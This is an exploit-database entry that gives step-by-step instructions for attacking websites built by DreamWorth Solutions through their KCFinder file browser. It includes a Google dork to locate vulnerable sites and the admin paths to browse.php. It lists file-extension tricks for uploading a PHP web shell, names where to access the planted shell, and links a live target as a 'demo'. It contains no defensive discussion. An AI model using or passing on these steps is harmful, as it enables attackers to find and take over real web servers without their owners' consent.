DreamWorth Solutions Kcfinder upload

2017.12.20
id Mr.Hydra (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"Powered by DreamWorth Solutions Pvt Ltd"

Exploit title : DreamWorth Solutions Kcfinder upload Author : Mr.Hydra Google Dork : intext:"Powered by DreamWorth Solutions Pvt Ltd" Tested on : Windows XP & Windows 7 Date : 2017-12-20 Vendor Hompage : https://www.dreamworth.in/ Tutor : Dorking dork in google Open Target exploit targer for exploit : /admin/js/plugins/kcfinder-master/browse.php or /administrator/js/plugins/kcfinder-master/browse.php Upload yoour shell with bypas ext shell.php.fla or shell.php.pjpg or shell.php.php5 or shell.PhP.black acces your shell in : /admin/js/plugins/kcfinder-master/upload/files/yourshell or /administrator/js/plugins/kcfinder-master/upload/files/yourshell For demo : https://www.dreamworth.in/admin/js/plugins/kcfinder-master/browse.php


See this note in RAW Version
Vote for this issue:
62%
38%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top